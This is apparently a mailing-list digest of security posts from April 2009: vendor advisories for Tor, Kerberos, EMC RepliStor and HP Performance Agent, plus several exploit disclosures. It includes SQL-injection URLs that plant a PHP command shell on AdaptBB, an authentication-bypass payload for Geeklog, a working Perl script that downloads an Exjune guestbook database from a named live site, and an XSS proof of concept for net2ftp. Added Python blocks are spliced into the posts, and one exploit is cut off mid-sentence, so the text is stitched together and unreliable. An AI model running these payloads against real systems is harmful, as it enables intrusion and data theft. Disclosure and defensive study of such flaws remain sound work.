net2ftp <= 0.97 Cross-Site Scripting/Request Forgery

2009-04-09 Thread c1c4tr1z
#=cicatriz c1c4t...@voodoo-labs.org=#=(advisories)=#


#=net2ftp <= 0.97 Cross-Site Scripting/Request Forgery=#

#=~~=#

#=Advisory & Vulnerability Information=#



Title: net2ftp <= 0.97 Cross-Site Scripting/Request Forgery

Advisory ID: VUDO-2009-0804

Advisory URL: http://research.voodoo-labs.org/advisories/3

Date founded: 2009-04-02

Vendors contacted: net2ftp

Class: Multiple Vulnerabilities

Remotely Exploitable: Yes

Locally Exploitable: No

Exploit/PoC Available: Yes

Policy: Full Disclosure Policy (RFPolicy) v2.0



#=~~=#

#=Tested & Vulnerable packages=#



[+] net2ftp 0.97

[+] net2ftp 0.95



Beta:

[*] net2ftp 0.98 beta



#=~~=#

#=Solutions and Workarounds=#



The vendor didn't release any fix/update.



#=~~=#

#=Technical Information=#



Multiple vulnerabilities were found in the package net2ftp [1], version 0.98
and below. Two types of vulnerabilities were found: Cross-Site Scripting and
Cross-Site Request Forgery.



[*] Cross-Site Scripting (XSS):



This vulnerability is produced by a typo in the function
validateGenericInput(), where the extraction of the characters < and > fails
because the regular expression in charge of the extraction is invalid.



+++ includes/registerglobals.inc.php @@ 1088:1102

  1088  function validateGenericInput($input) {
  1089
  1090  // --
  1091  // Remove the following characters
  1092  // --
  1093
  1094  // Remove XSS code
  1095  //  $input = RemoveXSS($input);
  1096
  1097  // Remove <>
XXX   1098  $input = preg_replace("/<>]/", "", $input);
  1099
  1100  return $input;
  1101
  1102  } // end validateGenericInput

--- includes/registerglobals.inc.php



This can be easily fixed by adding a [ character to the pattern:



+++

$input = preg_replace("/[<>]/", "", $input);

---



[*] Cross-Site Request Forgery (CSRF):



All the forms on the web application are vulnerable because they don't check
any type of token to ensure that the user submitted the form. So an attacker
can trick the user into visiting a website with this type of method and
perform certain actions on the server, like create files,
delete/rename/upload/etc.



#=~~=#

#=Proof of Concept=#



[*] Cross-Site Scripting (XSS):



+++

http://ftp.victim.com/?state=login_smallerrormessage=iframe 
onload=alert(/voodoo/.source);

---



[*] Cross-Site Request Forgery (CSRF):



With this HTML page an attacker can create an evil PHP script on the
user's server. (uuencoded)



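The regex typo and the missing form token described in this advisory, as an added Python example that is not part of the original post or of net2ftp: the two patterns are my reconstruction from the advisory's description, the sample input is constructed, and the CSRF helpers illustrate the check the author says the forms lack.

```python
import hmac
import html
import re
import secrets

# Pattern as shipped in validateGenericInput() according to the advisory
# (reconstructed, not net2ftp's own source): without the opening "[" the
# intended character class degrades to the literal three-character
# sequence "<>]", so lone "<" and ">" characters pass straight through.
BROKEN_PATTERN = re.compile(r"<>]")

# Pattern with the "[" restored, as the advisory proposes: a character
# class that matches a single "<" or ">".
FIXED_PATTERN = re.compile(r"[<>]")


def validate_generic_input_broken(value):
    """Mirror of the typo'd filter: removes only the exact text '<>]'."""
    return BROKEN_PATTERN.sub("", value)


def validate_generic_input_fixed(value):
    """Filter with the character class repaired: strips every '<' and '>'."""
    return FIXED_PATTERN.sub("", value)


def render_for_html(value):
    """Escape at the output sink instead of stripping at the input.

    This is the control a defender would add alongside the regex fix: the
    text survives unchanged for the user but cannot open a tag or break
    out of an attribute in the errormessage parameter's HTML context.
    """
    return html.escape(value, quote=True)


# Constructed sample value, not taken from the advisory's PoC.
SAMPLE_INPUT = "<b>login failed</b>"


# --- Per-session form token, the check the advisory says every form lacks ---

def issue_csrf_token(session):
    """Generate a fresh random token and remember it in the server-side session."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def verify_csrf_token(session, submitted):
    """Accept a form submission only when its token equals the session's token.

    A cross-site page cannot read the victim's session token, so a forged
    POST arrives without it (or with a guess) and is rejected here before
    any file operation runs. compare_digest avoids timing leaks.
    """
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)
```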


[ GLSA 200904-11 ] Tor: Multiple vulnerabilities

2009-04-09 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200904-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Tor: Multiple vulnerabilities
  Date: April 08, 2009
  Bugs: #250018, #256078, #258833
ID: 200904-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities in Tor might allow for heap corruption, Denial
of Service, escalation of privileges and information disclosure.

Background
==

Tor is an implementation of second generation Onion Routing, a
connection-oriented anonymizing communication service.

Affected packages
=

---
     Package          /  Vulnerable  /  Unaffected
---
  1  net-misc/tor        < 0.2.0.34     >= 0.2.0.34

Description
===

* Theo de Raadt reported that the application does not properly drop
  privileges to the primary groups of the user specified via the User
  configuration option (CVE-2008-5397).

* rovv reported that the ClientDNSRejectInternalAddresses
  configuration option is not always enforced (CVE-2008-5398).

* Ilja van Sprundel reported a heap-corruption vulnerability that
  might be remotely triggerable on some platforms (CVE-2009-0414).

* It has been reported that incomplete IPv4 addresses are treated as
  valid, violating the specification (CVE-2009-0939).

* Three unspecified vulnerabilities have also been reported
  (CVE-2009-0936, CVE-2009-0937, CVE-2009-0938).

Impact
==

A local attacker could escalate privileges by leveraging unintended
supplementary group memberships of the Tor process. A remote attacker
could exploit these vulnerabilities to cause a heap corruption with
unknown impact and attack vectors, to cause a Denial of Service via CPU
consumption or daemon crash, and to weaken anonymity provided by the
service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Tor users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-misc/tor-0.2.0.34

References
==

  [ 1 ] CVE-2008-5397
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5397
  [ 2 ] CVE-2008-5398
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5398
  [ 3 ] CVE-2009-0414
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0414
  [ 4 ] CVE-2009-0936
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0936
  [ 5 ] CVE-2009-0937
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0937
  [ 6 ] CVE-2009-0938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0938
  [ 7 ] CVE-2009-0939
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0939

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




OpenVAS now beyond 10000 Network Vulnerability Tests

2009-04-09 Thread Michael Wiegand
Hello,

Passing the 10000th Network Vulnerability Test (NVT) is a perfect
occasion to report about the progress of the OpenVAS project[1].

In October 2008 the systematic development of new NVTs started with a
base of around 5800 Tests. With the release of OpenVAS 2.0 in December
2008, the development was boosted and has now reached an average of 10
code updates per day.  The public OpenVAS NVT Feed Service delivers 3-10
new vulnerability tests every day.

The significantly grown and globally distributed developer team will
gather at the second OpenVAS developers conference[2] July 9-12 2009 in
Germany. During the conference features and a roadmap for OpenVAS 3.0
will be scheduled.

The OpenVAS project is backed by a number of companies, which also
supplement the project with professional services[3]. These companies
include Greenbone Networks, SecPod, Intevation and SecuritySpace.
"Reaching the professional enterprise market is a good indicator that
OpenVAS gained maturity very fast," says Tim Brown, founder of the
OpenVAS project.

While OpenVAS 3.0 will likely appear in 2009, users of OpenVAS 1.0
should prepare to migrate as support for 1.0 will end during 2009.

Regards,

Michael Wiegand

[1] http://www.openvas.org
[2] http://www.openvas.org/openvas-devcon2.html
[3] http://www.openvas.org/professional-services.html
-- 
Michael Wiegand | OpenPGP: D7D049EC | Intevation GmbH - www.intevation.de
Neuer Graben 17, 49074 Osnabrück, Germany   |AG Osnabrück, HR B 18998
Geschäftsführer: Frank Koormann,  Bernhard Reiter,  Dr. Jan-Oliver Wagner




AdaptBB 1.0 Beta Multiple Remote Vulnerabilities

2009-04-09 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/

[+] Bugs: [A] Multiple Blind SQL Injection
  [B] Multiple Dynamic Code Execution
  [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary SQL
queries.


- [B] Multiple Dynamic Code Execution

[-] Risk: high
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary php
code.

...

if ($_GET['box']) {
    $folder = $_GET['box'];
}

...

$ddata[] = ucwords($folder);

...

eval ("?>" . str_replace($cdata, $ddata, stripslashes(template($view . "_header"))) . "<?php ");

...


- [C] Arbitrary File Upload

[-] Risk: high
[-] File affected: attach.php

This bug allows a registered user to upload
arbitrary files and to execute them from
inc/attachments directory. This is possible
because there are no controls on file extension
on the server side but only on the client side.


*

[+] Code


- [A] Multiple Blind SQL Injection

http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL
SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL
SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

To execute commands:

http://site/path/rce.php?cmd=uname -a


- [B] Multiple Dynamic Code Execution

http://www.site.com/path/index.php?do=profileuser=blablabox=?php
echo pre; system('ls'); echo /pre?

http://www.site.com/path/index.php?do=messagesuser=blablabox=?php
echo pre; system('ls'); echo /pre?


*

[+] Fix

To fix them you must check the input properly.
However, it is not recommended to store your real
username and password in the cookies.


*

-- 
Salvatore drosophila Fresta
CWNP444351

FGA-2009-003:EMC RepliStor Buffer Overflow Vulnerability

2009-04-09 Thread noreply-secresea...@fortinet.com
FGA-2009-003:EMC RepliStor Buffer Overflow Vulnerability  
2009.April.08  

Summary:  
 
Fortinet's FortiGuard Global Security Research Team has discovered a buffer 
overflow vulnerability in EMC RepliStor. 

Impact: 
===
Remote code execution. 

Risk:  
=
Critical

Affected Software:  
==
EMC RepliStor 6.2 SP4 and earlier 
EMC RepliStor 6.3 SP1 and earlier 

Additional Information:
==
A remote, unauthenticated user may connect over TCP to the 
ctrlservice.exe or rep_srv.exe process and send a specially-crafted 
message to cause a heap based buffer overflow, which can result in 
arbitrary code execution. 


Solutions:
===
The FortiGuard Global Security Research Team released the signature 
EMC.RepliStor.Integer.Overflow 

Users should use EMC's Powerlink solution to upgrade to the following EMC 
RepliStor products: 
RepliStor 6.2 SP5: Navigate in Powerlink to Home > Support > Software 
Downloads and Licensing > Downloads P-R > RepliStor 6.2 SP5 
RepliStor 6.3 SP2: Navigate in Powerlink to Home > Support > Software 
Downloads and Licensing > Downloads P-R > RepliStor 6.3 SP2 

Fortinet customers who subscribe to Fortinet’s intrusion prevention (IPS) 
service should be protected against this buffer overflow 
vulnerability. Fortinet’s IPS service is one component of FortiGuard 
Subscription Services, which also offer comprehensive solutions 
such as antivirus, Web content filtering and antispam capabilities. These 
services enable protection against threats on both application 
and network layers. FortiGuard Services are continuously updated by the 
FortiGuard Global Security Research Team, which enables Fortinet 
to deliver a combination of multi-layered security intelligence and true 
zero-day protection from new and emerging threats. 
These updates are delivered to all FortiGate, FortiMail and FortiClient 
products. Fortinet strictly follows responsible disclosure 
guidelines to ensure optimum protection during a threat's lifecycle. 

References:  
===
FortiGuard Advisory: 
http://www.fortiguardcenter.com/advisory/FGA-2009-13.html
EMC Powerlink: powerlink.emc.com 
CVE ID: CVE-2009-1119 

Acknowledgments:   

 
Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team


Disclaimer:
===

Although Fortinet has attempted to provide accurate information in these 
materials, Fortinet assumes no legal responsibility for 
the accuracy or completeness of the information. More specific information 
is available on request from Fortinet. Please note that 
Fortinet's product information does not constitute or contain any 
guarantee, warranty or legally binding representation, unless 
expressly identified as such in a duly signed writing.

About Fortinet ( www.fortinet.com ):


Fortinet is the pioneer and leading provider of ASIC-accelerated unified 
threat management, or UTM, security systems, which are used 
by enterprises and service providers to increase their security while 
reducing total operating costs. Fortinet solutions were built 
from the ground up to integrate multiple levels of security 
protection--including firewall, antivirus, intrusion prevention, VPN, 
spyware prevention and anti-spam -- designed to help customers protect 
against network and content level threats. Leveraging a custom 
ASIC and unified interface, Fortinet solutions offer advanced security 
functionality that scales from remote office to chassis-based 
solutions with integrated management and reporting. Fortinet solutions have 
won multiple awards around the world and are the only 
security products that are certified in six programs by ICSA Labs: 
(Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). 
Fortinet is privately held and based in Sunnyvale, California.



Geeklog <=1.5.2 'SESS_updateSessionTime()' vulnerability

2009-04-09 Thread nospam
As the vendor stated, see:

http://www.geeklog.net/article.php/geeklog-1.5.2sr2



geeklog is also vulnerable to this:

http://www.securityfocus.com/bid/34361/info



actually this should be renamed to



glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability


Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

2009-04-09 Thread nospam
<?php

/*

Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/

software site: http://www.geeklog.net/

credit goes to rgod, bug found more than a year ago

working against PHP >= 5.0

google dorks: By Geeklog Created this page in +seconds +powered
              By Geeklog Created this page in +seconds +powered inurl:public_html

vulnerability, see /public_html/webservices/atom/index.php near lines 34-53:

...

require_once '../../lib-common.php';

if (PHP_VERSION < 5) {
    $_CONF['disable_webservices'] = true;
} else {
    require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
    COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}

header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');

WS_authenticate();

...



now WS_authenticate() function in /system/lib-webservices.php near lines
780-877:

...

function WS_authenticate()
{
    global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;

    $uid = '';
    $username = '';
    $password = '';

    $status = -1;

    if (isset($_SERVER['PHP_AUTH_USER'])) {
        $username = $_SERVER['PHP_AUTH_USER'];
        $password = $_SERVER['PHP_AUTH_PW'];

        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username'");
        }
    } elseif (!empty($_SERVER['REMOTE_USER'])) {

        list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']);
        list($username, $password) = explode(':', base64_decode($auth_data));

        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username' (via \$_SERVER['REMOTE_USER'])");
        }
    } else {
        if ($WS_VERBOSE) {
            COM_errorLog("WS: No login given");
        }
    }

...



and after, near lines 907-909:

...

    if (($status == -1) && $_CONF['user_login_method']['standard']) {
        $status = SEC_authenticate($username, $password, $uid);
    }

...





now open /system/lib-security.php near lines 695-717:

...

function SEC_authenticate($username, $password, &$uid)
{
    global $_CONF, $_TABLES, $LANG01;

    $result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //--- SQL INJECTION HERE
    $tmp = DB_error();
    $nrows = DB_numRows($result);

    if (($tmp == 0) && ($nrows == 1)) {
        $U = DB_fetchArray($result);
        $uid = $U['uid'];
        if ($U['status'] == USER_ACCOUNT_DISABLED) {
            // banned, jump to here to save an md5 calc.
            return USER_ACCOUNT_DISABLED;
        } elseif ($U['passwd'] != SEC_encryptPassword($password)) {
            return -1; // failed login
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
            return USER_ACCOUNT_AWAITING_APPROVAL;
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {
            // Awaiting user activation, activate:
            DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE,
                      'username', $username);
            return USER_ACCOUNT_ACTIVE;
        } else {
            return $U['status']; // just return their status
        }
    } else {
        $tmp = $LANG01[32] . ": '" . $username . "'";
        COM_errorLog($tmp, 1);
        return -1;
    }
}

...



you can inject sql code in the 'username' argument of this function; it may
come from the $_SERVER['PHP_AUTH_USER'] or $_SERVER['REMOTE_USER'] php
variables.
These vars are used for both HTTP Basic and Digest Authentication methods,
see PHP manual:



http://www.php.net/manual/en/features.http-auth.php



manual poc, visit http://host/path_to_geeklog/webservices/atom/index.php

then type:



username: ' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/*

password: 



authentication mechanism is bypassed!

Note that it is passed base64_encode()'d !



Now you have access to some dangerous functions:



service_submit_staticpages()

service_delete_staticpages()

service_get_staticpages()

service_getTopicList_staticpages()



in /plugins/staticpages/services.inc.php



service_submit_story()

service_delete_story()

service_get_story()

service_getTopicList_story()



in /system/lib-story.php



ex. the service_submit_staticpages() one allows one to specify a dangerous
sp_php flag in submitting staticpages; if the staticpages.PHP permission
is set to true for the staticpage admin (not the default), the page will be
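As an added Python example (not Geeklog's code and not the exploit author's), the two defensive changes this post points at: parse the Basic credentials that WS_authenticate() takes from REMOTE_USER on the first colon only, and bind the username as a query parameter instead of interpolating it into the SELECT. The users table, the password hash and the sample header are constructed for the demonstration and do not reproduce Geeklog's schema or SEC_encryptPassword().

```python
import base64
import binascii
import hashlib
import hmac
import sqlite3


def parse_basic_credentials(remote_user):
    """Split the 'Basic <base64>' value WS_authenticate() reads from REMOTE_USER.

    Returns (username, password) or None when the value is not well-formed.
    Splitting the decoded text on the first ':' only keeps a password that
    itself contains ':' intact; the explode()/list() pair in the post keeps
    just the first two pieces.
    """
    parts = remote_user.split(" ", 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(parts[1], validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    username, sep, password = decoded.partition(":")
    if not sep:
        return None
    return username, password


def hash_password(password):
    # Placeholder for SEC_encryptPassword(); the real scheme is not on the page.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def open_sample_db():
    """Constructed in-memory stand-in for the users table (not Geeklog's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (uid INTEGER, username TEXT, passwd TEXT, "
        "status INTEGER, remoteservice TEXT)"
    )
    con.execute(
        "INSERT INTO users VALUES (2, 'Admin', ?, 3, NULL)",
        (hash_password("correct horse"),),
    )
    return con


def sec_authenticate(con, username, password):
    """Parameterised form of the lookup marked '//--- SQL INJECTION HERE'.

    The username travels to the database as a bound value, so quotes,
    comment markers or UNION clauses inside it are compared literally
    against the column and cannot change the query's shape. Returns the
    uid on success and -1 on any failure, mirroring the PHP contract.
    """
    row = con.execute(
        "SELECT status, passwd, uid FROM users "
        "WHERE username = ? AND (remoteservice IS NULL OR remoteservice = '')",
        (username,),
    ).fetchone()
    if row is None:
        return -1
    _status, stored_hash, uid = row
    if not hmac.compare_digest(stored_hash, hash_password(password)):
        return -1
    return uid


# Constructed sample header: user 'Admin' with a password containing ':'.
SAMPLE_REMOTE_USER = "Basic " + base64.b64encode(b"Admin:pa:ss").decode("ascii")
```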


Exjune Guestbook v2 Remote Database Disclosure Exploit

2009-04-09 Thread alphanix00
#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###
# script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
###
# Vulnerable :
# database path : /admin/exdb.mdb
##
# Real Life Example :
#
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found & Exploited By AlpHaNiX
#
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook//
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
##
# Greetz for Zigma/Djek/unary/r1z

use strict;
use warnings;
use LWP::UserAgent;

system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2');

if (!defined($ARGV[0])) { print "[!] Usage : \n./exploit http://site.com\n"; exit(); }

# Prepend the scheme when the argument was given as a bare host name
my $site = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0] : "http://" . $ARGV[0];

print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n";
print "[-] Found & Exploited By AlpHaNiX \n\n\n";
print "[!] Exploiting $site \n";

my $target    = $site . "/admin/exdb.mdb";
my $useragent = LWP::UserAgent->new();
my $request   = $useragent->get($target, ':content_file' => 'c:/db.mdb');

if ($request->is_success) { print "[+] $site Exploited ! Database saved to c:/db.mdb"; exit(); }
else { print "[!] Exploiting $site Failed !\n[!] " . $request->status_line . "\n"; exit(); }



[SECURITY] [DSA 1766-1] New krb5 packages fix several vulnerabilities

2009-04-09 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1766-1secur...@debian.org
http://www.debian.org/security/ Nico Golde
April 9th, 2009 http://www.debian.org/security/faq
- --

Package: krb5
Vulnerability  : several
Problem type   : local/remote
Debian-specific: no
CVE IDs: CVE-2009-0844, CVE-2009-0845, CVE-2009-0847, CVE-2009-0846
Debian Bug : none


Several vulnerabilities have been found in the MIT reference implementation
of Kerberos V5, a system for authenticating users and services on a network.
The Common Vulnerabilities and Exposures project identified the following
problems:

The Apple Product Security team discovered that the SPNEGO GSS-API mechanism
suffers from a missing bounds check when reading a network input buffer, which
results in an invalid read crashing the application or possibly leaking
information (CVE-2009-0844).

Under certain conditions the SPNEGO GSS-API mechanism references a null pointer
which crashes the application using the library (CVE-2009-0845).

An incorrect length check inside the ASN.1 decoder of the MIT krb5
implementation allows an unauthenticated remote attacker to crash the kinit
or KDC program (CVE-2009-0847).

Under certain conditions the ASN.1 decoder of the MIT krb5 implementation
frees an uninitialized pointer, which could lead to denial of service and
possibly arbitrary code execution (CVE-2009-0846).


For the oldstable distribution (etch), this problem has been fixed in
version 1.4.4-7etch7.

For the stable distribution (lenny), this problem has been fixed in
version 1.6.dfsg.4~beta1-5lenny1.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.dfsg.4~beta1-13.


We recommend that you upgrade your krb5 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.


[security bulletin] HPSBMA02396 SSRT080175 rev.1 - HP OpenView Performance Agent and HP Performance Agent Running on Windows, Remote Execution of Arbitrary Code

2009-04-09 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01622011
Version: 1

HPSBMA02396 SSRT080175 rev.1 - HP OpenView Performance Agent and HP Performance 
Agent Running on Windows, Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2009-04-08
Last Updated: 2009-04-08

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView 
Performance Agent and HP Performance Agent. The vulnerability could be 
exploited remotely to execute arbitrary code.

References: CVE-2008-4420, SA21180

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Performance Agent vC.04.60 and HP Performance Agent vC.04.70 and 
vC.04.72 running on Windows

BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2008-4420 (AV:N/AC:L/Au:N/C:C/I:C/A:C)  10.0
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
 
RESOLUTION

HP has provided a hotfix to resolve this vulnerability. Please contact the 
normal HP Services support channel and request the Performance Agent Hotfix: 
Migrate away from the 3.0.0.15 version of DynaZip library. 

PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 8 April 2009 Initial release 

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux 
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement.

©Copyright 2009 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental, special 
or consequential 

[ GLSA 200904-09 ] MIT Kerberos 5: Multiple vulnerabilities

2009-04-09 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200904-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: MIT Kerberos 5: Multiple vulnerabilities
  Date: April 08, 2009
  Bugs: #262736, #263398
ID: 200904-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities in MIT Kerberos 5 might allow remote
unauthenticated users to execute arbitrary code with root privileges.

Background
==

MIT Kerberos 5 is a suite of applications that implement the Kerberos
network protocol. kadmind is the MIT Kerberos 5 administration daemon,
KDC is the Key Distribution Center.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  app-crypt/mit-krb5                 < 1.6.3-r6                >= 1.6.3-r6

Description
===

Multiple vulnerabilities have been reported in MIT Kerberos 5:

* A free() call on an uninitialized pointer in the ASN.1 decoder when
  decoding an invalid encoding (CVE-2009-0846).

* A buffer overread in the SPNEGO GSS-API application, reported by
  Apple Product Security (CVE-2009-0844).

* A NULL pointer dereference in the SPNEGO GSS-API application,
  reported by Richard Evans (CVE-2009-0845).

* An incorrect length check inside an ASN.1 decoder leading to
  spurious malloc() failures (CVE-2009-0847).

Impact
==

A remote unauthenticated attacker could exploit the first vulnerability
to cause a Denial of Service or, in unlikely circumstances, execute
arbitrary code on the host running krb5kdc or kadmind with root
privileges and compromise the Kerberos key database. Exploitation of
the other vulnerabilities might lead to a Denial of Service in kadmind,
krb5kdc, or other daemons performing authorization against Kerberos
that utilize GSS-API or an information disclosure.

Workaround
==

There is no known workaround at this time.

Resolution
==

